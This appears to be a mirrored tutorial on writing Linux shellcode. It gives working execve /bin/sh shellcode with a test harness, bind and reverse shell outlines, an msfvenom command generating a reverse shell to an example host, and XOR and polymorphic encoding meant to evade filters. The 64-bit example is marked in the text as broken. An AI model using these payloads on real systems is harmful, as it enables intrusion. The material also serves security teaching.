mirror of
https://github.com/The-Art-of-Hacking/h4cker.git
synced 2025-12-27 22:24:46 -05:00
631 lines
14 KiB
Markdown
631 lines
14 KiB
Markdown
# Shellcode Basics
|
|
|
|
## What is Shellcode?
|
|
|
|
**Shellcode** is a small piece of machine code that is injected into a vulnerable program to execute arbitrary commands. The name comes from its original purpose: spawning a command shell. Today, shellcode can perform any action: download files, create backdoors, escalate privileges, or execute any code.
|
|
|
|
### Key Characteristics
|
|
|
|
1. **Position-Independent** - Runs regardless of memory location
|
|
2. **Self-Contained** - No external dependencies
|
|
3. **Compact** - Small size to fit in limited buffers
|
|
4. **Avoids Bad Characters** - Works around input restrictions (null bytes, etc.)
|
|
|
|
## How Shellcode Works
|
|
|
|
### The Execution Flow
|
|
|
|
```
|
|
1. Vulnerability triggered (buffer overflow)
|
|
↓
|
|
2. Shellcode injected into memory
|
|
↓
|
|
3. Return address overwritten to point to shellcode
|
|
↓
|
|
4. Program returns/jumps to shellcode location
|
|
↓
|
|
5. Shellcode executes with program's privileges
|
|
↓
|
|
6. Attacker gains control (shell, backdoor, etc.)
|
|
```
|
|
|
|
## Anatomy of Shellcode
|
|
|
|
### Example: Linux x86 Shellcode (execve("/bin/sh"))
|
|
|
|
```assembly
|
|
; 32-bit Linux shellcode to spawn /bin/sh
|
|
section .text
|
|
global _start
|
|
|
|
_start:
|
|
; execve("/bin/sh", ["/bin/sh", NULL], NULL)
|
|
|
|
xor eax, eax ; Zero out EAX (0x00000000)
|
|
push eax ; Push NULL terminator for string
|
|
push 0x68732f2f ; Push "//sh" (reverse order, little-endian)
|
|
push 0x6e69622f ; Push "/bin" (reverse order)
|
|
mov ebx, esp ; EBX = pointer to "/bin//sh" string
|
|
|
|
push eax ; Push NULL (argv[1])
|
|
push ebx ; Push pointer to "/bin//sh" (argv[0])
|
|
mov ecx, esp ; ECX = pointer to argv array
|
|
|
|
cdq ; Sign-extend EAX into EDX; EAX is 0 here, so EDX = 0
|
|
mov al, 0x0b ; syscall number for execve (11)
|
|
int 0x80 ; Invoke syscall
|
|
```
|
|
|
|
### Machine Code Representation
|
|
|
|
```c
|
|
unsigned char shellcode[] =
|
|
"\x31\xc0" // xor eax, eax
|
|
"\x50" // push eax
|
|
"\x68\x2f\x2f\x73\x68" // push 0x68732f2f
|
|
"\x68\x2f\x62\x69\x6e" // push 0x6e69622f
|
|
"\x89\xe3" // mov ebx, esp
|
|
"\x50" // push eax
|
|
"\x53" // push ebx
|
|
"\x89\xe1" // mov ecx, esp
|
|
"\x99" // cdq
|
|
"\xb0\x0b" // mov al, 0x0b
|
|
"\xcd\x80"; // int 0x80
|
|
```
|
|
|
|
**Size**: 24 bytes
|
|
|
|
## System Calls and Shellcode
|
|
|
|
### Linux x86 System Calls
|
|
|
|
System calls are how programs interact with the kernel:
|
|
|
|
```c
|
|
int 0x80 // x86 (32-bit) syscall instruction
|
|
syscall // x64 (64-bit) syscall instruction
|
|
```
|
|
|
|
**Register Convention (x86):**
|
|
- `EAX` - Syscall number
|
|
- `EBX` - 1st argument
|
|
- `ECX` - 2nd argument
|
|
- `EDX` - 3rd argument
|
|
- `ESI` - 4th argument
|
|
- `EDI` - 5th argument
|
|
|
|
**Common Syscall Numbers (x86):**
|
|
| Syscall | Number (decimal) | Number (hex) |
|
|
|---------|------------------|--------------|
|
|
| exit | 1 | 0x01 |
|
|
| read | 3 | 0x03 |
|
|
| write | 4 | 0x04 |
|
|
| execve | 11 | 0x0b |
|
|
| socketcall | 102 | 0x66 |
|
|
|
|
### execve() System Call
|
|
|
|
```c
|
|
int execve(const char *filename, char *const argv[], char *const envp[]);
|
|
```
|
|
|
|
**To execute /bin/sh:**
|
|
```c
|
|
execve("/bin/sh", ["/bin/sh", NULL], NULL);
|
|
```
|
|
|
|
**In Assembly:**
|
|
```assembly
|
|
mov eax, 11 ; execve syscall number
|
|
mov ebx, addr ; EBX = pointer to "/bin/sh"
|
|
mov ecx, args ; ECX = pointer to argv
|
|
mov edx, 0 ; EDX = NULL (envp)
|
|
int 0x80 ; Execute syscall
|
|
```
|
|
|
|
## Writing Shellcode from Scratch
|
|
|
|
### Step 1: Write High-Level Code
|
|
|
|
```c
|
|
#include <unistd.h>
|
|
|
|
int main() {
|
|
char *args[] = {"/bin/sh", NULL};
|
|
execve("/bin/sh", args, NULL);
|
|
return 0;
|
|
}
|
|
```
|
|
|
|
### Step 2: Compile and Examine
|
|
|
|
```bash
|
|
# Compile
|
|
gcc -o test test.c
|
|
|
|
# Disassemble
|
|
objdump -d test | grep -A 20 "<main>"
|
|
|
|
# Or use GDB
|
|
gdb ./test
|
|
(gdb) disassemble main
|
|
```
|
|
|
|
### Step 3: Convert to Pure Assembly
|
|
|
|
```assembly
|
|
section .text
|
|
global _start
|
|
|
|
_start:
|
|
; Build the string "/bin//sh" on the stack (the extra slash pads it to 8 bytes; the kernel treats "//" as "/")
|
|
xor eax, eax
|
|
push eax ; NULL terminator
|
|
push 0x68732f2f ; "//sh"
|
|
push 0x6e69622f ; "/bin"
|
|
mov ebx, esp ; EBX points to "/bin//sh"
|
|
|
|
; Build argv array
|
|
push eax ; argv[1] = NULL
|
|
push ebx ; argv[0] = "/bin//sh"
|
|
mov ecx, esp ; ECX points to argv
|
|
|
|
; Set up syscall
|
|
cdq ; EDX = 0 (envp = NULL)
|
|
mov al, 0x0b ; execve syscall
|
|
int 0x80 ; Execute
|
|
```
|
|
|
|
### Step 4: Assemble and Extract
|
|
|
|
```bash
|
|
# Assemble with NASM
|
|
nasm -f elf32 shellcode.asm -o shellcode.o
|
|
|
|
# Link
|
|
ld -m elf_i386 shellcode.o -o shellcode
|
|
|
|
# Extract machine code
|
|
objdump -d shellcode
|
|
|
|
# Or use this to get hex bytes:
|
|
objdump -d shellcode | grep '[0-9a-f]:' | \
|
|
grep -v 'file' | cut -f2 -d: | cut -f1-6 -d' ' | \
|
|
tr -s ' ' | tr '\t' ' ' | sed 's/ $//g' | sed 's/ /\\x/g' | \
|
|
paste -d '' -s | sed 's/^/"/' | sed 's/$/"/g'
|
|
```
|
|
|
|
### Step 5: Test the Shellcode
|
|
|
|
```c
|
|
// test_shellcode.c
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
unsigned char code[] =
|
|
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
|
|
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
|
|
"\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
|
|
|
|
int main() {
|
|
printf("Shellcode length: %zu bytes\n", strlen(code));
|
|
void (*func)() = (void(*)())code;
|
|
func();
|
|
return 0;
|
|
}
|
|
```
|
|
|
|
```bash
|
|
# Compile with executable stack
|
|
gcc test_shellcode.c -o test_shellcode -fno-stack-protector -z execstack -m32
|
|
|
|
# Run
|
|
./test_shellcode
|
|
# Should spawn a shell!
|
|
```
|
|
|
|
## Common Shellcode Types
|
|
|
|
### 1. Bind Shell
|
|
|
|
Listens on a port for incoming connections:
|
|
|
|
```c
|
|
// Pseudo-code
|
|
socket(AF_INET, SOCK_STREAM, 0);
|
|
bind(sockfd, {port=4444}, ...);
|
|
listen(sockfd, 0);
|
|
accept(sockfd, ...);
|
|
dup2(clientfd, 0); // stdin
|
|
dup2(clientfd, 1); // stdout
|
|
dup2(clientfd, 2); // stderr
|
|
execve("/bin/sh", ...);
|
|
```
|
|
|
|
**Usage:**
|
|
- Attacker connects to victim's port 4444
|
|
- Gets shell access
|
|
|
|
### 2. Reverse Shell
|
|
|
|
Connects back to attacker's machine:
|
|
|
|
```c
|
|
// Pseudo-code
|
|
socket(AF_INET, SOCK_STREAM, 0);
|
|
connect(sockfd, {attacker_ip, attacker_port}, ...);
|
|
dup2(sockfd, 0);
|
|
dup2(sockfd, 1);
|
|
dup2(sockfd, 2);
|
|
execve("/bin/sh", ...);
|
|
```
|
|
|
|
**Usage:**
|
|
- Attacker listens on their machine
|
|
- Victim connects back
|
|
- Often bypasses inbound firewall filtering, because the connection is initiated outbound from the victim
|
|
|
|
### 3. Staged Shellcode
|
|
|
|
- **Stage 1** (Stager): Small shellcode that downloads a larger payload
|
|
- **Stage 2** (Payload): Full-featured backdoor/shell
|
|
|
|
**Advantages:**
|
|
- Fits in smaller buffers
|
|
- More flexible
|
|
- Can be updated/changed
|
|
|
|
### 4. Meterpreter-style
|
|
|
|
Advanced multi-function payload:
|
|
- File upload/download
|
|
- Port forwarding
|
|
- Privilege escalation
|
|
- Persistence mechanisms
|
|
|
|
## Avoiding Bad Characters
|
|
|
|
### The Problem
|
|
|
|
Some functions stop at certain bytes:
|
|
- `strcpy()` stops at `0x00` (null byte)
|
|
- `scanf("%s")` stops at any whitespace (`0x09`-`0x0d`, `0x20`); `gets()`/`fgets()` stop at `0x0a` (newline)
|
|
- Some filters remove special characters
|
|
|
|
### Solution Techniques
|
|
|
|
#### Technique 1: Encoding
|
|
|
|
```assembly
|
|
; Instead of using null bytes directly:
|
|
mov eax, 0 ; Contains null bytes (\xb8\x00\x00\x00\x00)
|
|
|
|
; Use:
|
|
xor eax, eax ; No null bytes (\x31\xc0)
|
|
```
|
|
|
|
#### Technique 2: String Building
|
|
|
|
```assembly
|
|
; Instead of:
|
|
push 0x0068732f ; Contains null byte
|
|
|
|
; Use:
|
|
xor eax, eax ; EAX = 0
|
|
push eax ; Push null byte separately
|
|
push 0x68732f2f ; Push "//sh" (no null)
|
|
```
|
|
|
|
#### Technique 3: SUB/ADD Encoding
|
|
|
|
```assembly
|
|
; To create 0x0b without using that byte:
|
|
mov al, 0x0c ; AL = 12
|
|
sub al, 0x01 ; AL = 11 (0x0b)
|
|
```
|
|
|
|
#### Technique 4: XOR Encoding
|
|
|
|
```python
|
|
# Encode entire shellcode with XOR
|
|
def xor_encode(shellcode, key=0x42):
|
|
encoded = bytes([b ^ key for b in shellcode])
|
|
|
|
# Decoder stub (to add before encoded shellcode)
|
|
decoder = (
|
|
b"\xeb\x0b" # jmp short +11
|
|
b"\x5e" # pop esi
|
|
b"\x31\xc9" # xor ecx, ecx
|
|
b"\xb1" + bytes([len(shellcode)]) # mov cl, length
|
|
b"\x80\x36" + bytes([key]) # xor byte [esi], key
|
|
b"\x46" # inc esi
|
|
b"\xe2\xf9" # loop -7
|
|
b"\xff\xe6" # jmp esi
|
|
b"\xe8\xf0\xff\xff\xff" # call -15
|
|
)
|
|
|
|
return decoder + encoded
|
|
```
|
|
|
|
### Finding Bad Characters
|
|
|
|
```python
|
|
#!/usr/bin/env python3
|
|
# Send all possible bytes and see which ones come through
|
|
|
|
# Generate test string with all bytes
|
|
test = bytes(range(1, 256)) # Excluding 0x00
|
|
|
|
# Send through vulnerable program and check what arrives
|
|
# Remove bytes that don't arrive = bad characters
|
|
```
|
|
|
|
## 64-bit Shellcode Differences
|
|
|
|
### Key Differences from 32-bit
|
|
|
|
1. **Registers**: 64-bit registers (RAX, RBX, RCX, etc.)
|
|
2. **Syscall**: Uses `syscall` instruction instead of `int 0x80`
|
|
3. **Syscall Numbers**: Different from 32-bit (e.g. `execve` is 59 instead of 11)
|
|
4. **Calling Convention**: Syscall number in RAX; arguments in RDI, RSI, RDX, R10, R8, R9 (instead of EBX, ECX, EDX, ESI, EDI)
|
|
|
|
### Example: 64-bit execve Shellcode
|
|
|
|
```assembly
|
|
section .text
|
|
global _start
|
|
|
|
_start:
|
|
; execve("/bin/sh", ["/bin/sh", NULL], NULL)
|
|
|
|
xor rax, rax
|
|
push rax ; NULL terminator
|
|
mov rax, 0x68732f6e69622f2f ; "//bin/sh" in reverse
|
|
push rax
|
|
mov rdi, rsp ; RDI = pointer to "//bin/sh"
|
|
|
|
push 0 ; argv[1] = NULL
|
|
push rdi ; argv[0] = "//bin/sh"
|
|
mov rsi, rsp ; RSI = pointer to argv
|
|
|
|
xor rdx, rdx ; RDX = NULL (envp)
|
|
mov al, 59 ; execve syscall number (64-bit); NOTE(review): writes only AL, and RAX still holds the string loaded above, so RAX != 59 here
|
|
syscall ; Execute
|
|
```
|
|
|
|
**Machine Code:**
|
|
```c
|
|
"\x48\x31\xc0\x50\x48\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68"
|
|
"\x50\x48\x89\xe7\x50\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05"
|
|
```
|
|
|
|
## Tools for Shellcode Generation
|
|
|
|
### msfvenom (Metasploit)
|
|
|
|
```bash
|
|
# Generate Linux x86 shellcode
|
|
msfvenom -p linux/x86/exec CMD=/bin/sh -f c
|
|
|
|
# Generate without bad characters
|
|
msfvenom -p linux/x86/exec CMD=/bin/sh -b '\x00\x0a\x0d' -f c
|
|
|
|
# Generate with encoder
|
|
msfvenom -p linux/x86/exec CMD=/bin/sh -e x86/shikata_ga_nai -f c
|
|
|
|
# Generate reverse shell
|
|
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f c
|
|
|
|
# List available payloads
|
|
msfvenom --list payloads | grep linux/x86
|
|
```
|
|
|
|
### pwntools
|
|
|
|
```python
|
|
from pwn import *
|
|
|
|
context.arch = 'i386'
|
|
context.os = 'linux'
|
|
|
|
# Generate shellcode
|
|
shellcode = asm(shellcraft.sh())
|
|
print(hexdump(shellcode))
|
|
|
|
# Or manually:
|
|
shellcode = asm("""
|
|
xor eax, eax
|
|
push eax
|
|
push 0x68732f2f
|
|
push 0x6e69622f
|
|
mov ebx, esp
|
|
push eax
|
|
push ebx
|
|
mov ecx, esp
|
|
mov al, 0x0b
|
|
int 0x80
|
|
""")
|
|
```
|
|
|
|
### Online Assemblers
|
|
|
|
- [Online Assembler and Disassembler](https://defuse.ca/online-x86-assembler.htm)
|
|
- [Shell Storm Shellcode Database](http://shell-storm.org/shellcode/)
|
|
- [Exploit Database Shellcodes](https://www.exploit-db.com/shellcodes)
|
|
|
|
## Testing Shellcode
|
|
|
|
### Method 1: C Wrapper
|
|
|
|
```c
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
unsigned char shellcode[] = "\\x31\\xc0...";
|
|
|
|
int main() {
|
|
printf("Shellcode length: %zu\n", strlen(shellcode));
|
|
printf("Executing shellcode...\n");
|
|
|
|
// Cast to function pointer and call
|
|
void (*func)() = (void(*)())shellcode;
|
|
func();
|
|
|
|
return 0;
|
|
}
|
|
```
|
|
|
|
### Method 2: Python
|
|
|
|
```python
|
|
#!/usr/bin/env python3
|
|
import ctypes
|
|
|
|
shellcode = b"\x31\xc0\x50..."
|
|
|
|
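# Copy the shellcode into a ctypes buffer (NOTE: this memory is not marked executable; calling into it will normally fault unless it is remapped with execute permission)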
|
|
memory = ctypes.create_string_buffer(shellcode, len(shellcode))
|
|
function = ctypes.cast(memory, ctypes.CFUNCTYPE(None))
|
|
|
|
print(f"[*] Shellcode length: {len(shellcode)}")
|
|
print("[*] Executing...")
|
|
|
|
# Execute
|
|
function()
|
|
```
|
|
|
|
### Method 3: GDB
|
|
|
|
```bash
|
|
# Create shellcode file
|
|
python3 -c "print('\x31\xc0\x50...', end='')" > shellcode.bin
|
|
|
|
# Test in GDB
|
|
gdb
|
|
(gdb) set {char[25]}$esp = {0x31, 0xc0, 0x50, ...}
|
|
(gdb) set $eip = $esp
|
|
(gdb) continue
|
|
```
|
|
|
|
## Polymorphic Shellcode
|
|
|
|
**Goal**: Make shellcode look different each time while maintaining functionality
|
|
|
|
### Technique 1: Variable Instruction Ordering
|
|
|
|
```assembly
|
|
; Original
|
|
mov eax, 11
|
|
mov ebx, addr
|
|
int 0x80
|
|
|
|
; Polymorphic variant 1
|
|
mov ebx, addr
|
|
mov eax, 11
|
|
int 0x80
|
|
|
|
; Polymorphic variant 2
|
|
xor eax, eax
|
|
mov al, 11
|
|
mov ebx, addr
|
|
int 0x80
|
|
```
|
|
|
|
### Technique 2: Garbage Instructions
|
|
|
|
```assembly
|
|
; Insert junk instructions that don't affect execution
|
|
nop
|
|
mov eax, eax ; Useless but valid
|
|
xchg eax, eax ; Another nop
|
|
```
|
|
|
|
### Technique 3: Dynamic Decoding
|
|
|
|
```assembly
|
|
; Each instance has different XOR key
|
|
; Decoder changes each time
|
|
```
|
|
|
|
## Alphanumeric Shellcode
|
|
|
|
**Constraint**: Only alphanumeric characters allowed (A-Z, a-z, 0-9)
|
|
|
|
**Why**: Some input filters only allow printable ASCII
|
|
|
|
**Technique**: Encode shellcode using only alphanumeric instructions
|
|
|
|
```assembly
|
|
; Limited instruction set:
|
|
PUSH/POP (0x50-0x5A; 0x5B-0x5F are not alphanumeric)
|
|
INC/DEC (0x41-0x4F; 0x40 is '@', not alphanumeric)
|
|
AND/SUB (some variations)
|
|
|
|
; Build more complex instructions through combining simple ones
|
|
```
|
|
|
|
**Tools**: `msfvenom` can generate alphanumeric shellcode
|
|
|
|
```bash
|
|
msfvenom -p linux/x86/exec CMD=/bin/sh \
|
|
--encoder x86/alpha_mixed -f c
|
|
```
|
|
|
|
## Debugging Shellcode
|
|
|
|
### Common Issues
|
|
|
|
**1. Segmentation Fault**
|
|
- Cause: Jumping to wrong address, bad instructions
|
|
- Debug: Use GDB, check each instruction
|
|
|
|
**2. Nothing Happens**
|
|
- Cause: Shellcode not executing, wrong syscall
|
|
- Debug: Verify shellcode placement and execution
|
|
|
|
**3. Invalid Instruction**
|
|
- Cause: Bad bytes, encoding errors
|
|
- Debug: Disassemble with `ndisasm` or `objdump`
|
|
|
|
### Debugging Workflow
|
|
|
|
```bash
|
|
# 1. Extract shellcode to file
|
|
python3 -c "print(b'\\x31\\xc0...'.decode('latin-1'), end='')" > sc.bin
|
|
|
|
# 2. Disassemble
|
|
ndisasm -b32 sc.bin
|
|
# or
|
|
objdump -D -b binary -m i386 sc.bin
|
|
|
|
# 3. Run in debugger
|
|
gdb ./shellcode_tester
|
|
(gdb) break *&code
|
|
(gdb) run
|
|
(gdb) stepi # Step through each instruction
|
|
(gdb) x/10i $eip # Examine next instructions
|
|
```
|
|
|
|
## Best Practices
|
|
|
|
1. **Keep it small** - Smaller shellcode fits in more exploits
|
|
2. **Avoid null bytes** - Use XOR, SUB, etc. to build values
|
|
3. **Test thoroughly** - Verify on target architecture
|
|
4. **Position-independent** - Don't use hardcoded addresses
|
|
5. **Document well** - Comment your assembly code
|
|
6. **Use tools** - Don't reinvent the wheel (msfvenom, pwntools)
|
|
7. **Check for bad chars** - Test with actual vulnerability
|
|
8. **Understand syscalls** - Know what you're calling
|
|
|
|
## Further Resources
|
|
|
|
- [Shellcode Database (Shell Storm)](http://shell-storm.org/shellcode/)
|
|
- [Exploit Database Shellcodes](https://www.exploit-db.com/shellcodes)
|
|
- [Phrack 49, Article 14: Smashing the Stack for Fun and Profit](http://www.phrack.org/issues/49/14.html)
|
|
- [Linux Syscall Table](https://syscalls.kernelgrok.com/)
|
|
- [pwntools Documentation](https://docs.pwntools.com/)
|
|
|
|
---
|
|
|
|
**⚠️ Important**: Shellcode is a powerful technique that should only be used for legitimate security testing with proper authorization. Unauthorized use is illegal and unethical.
|
|
|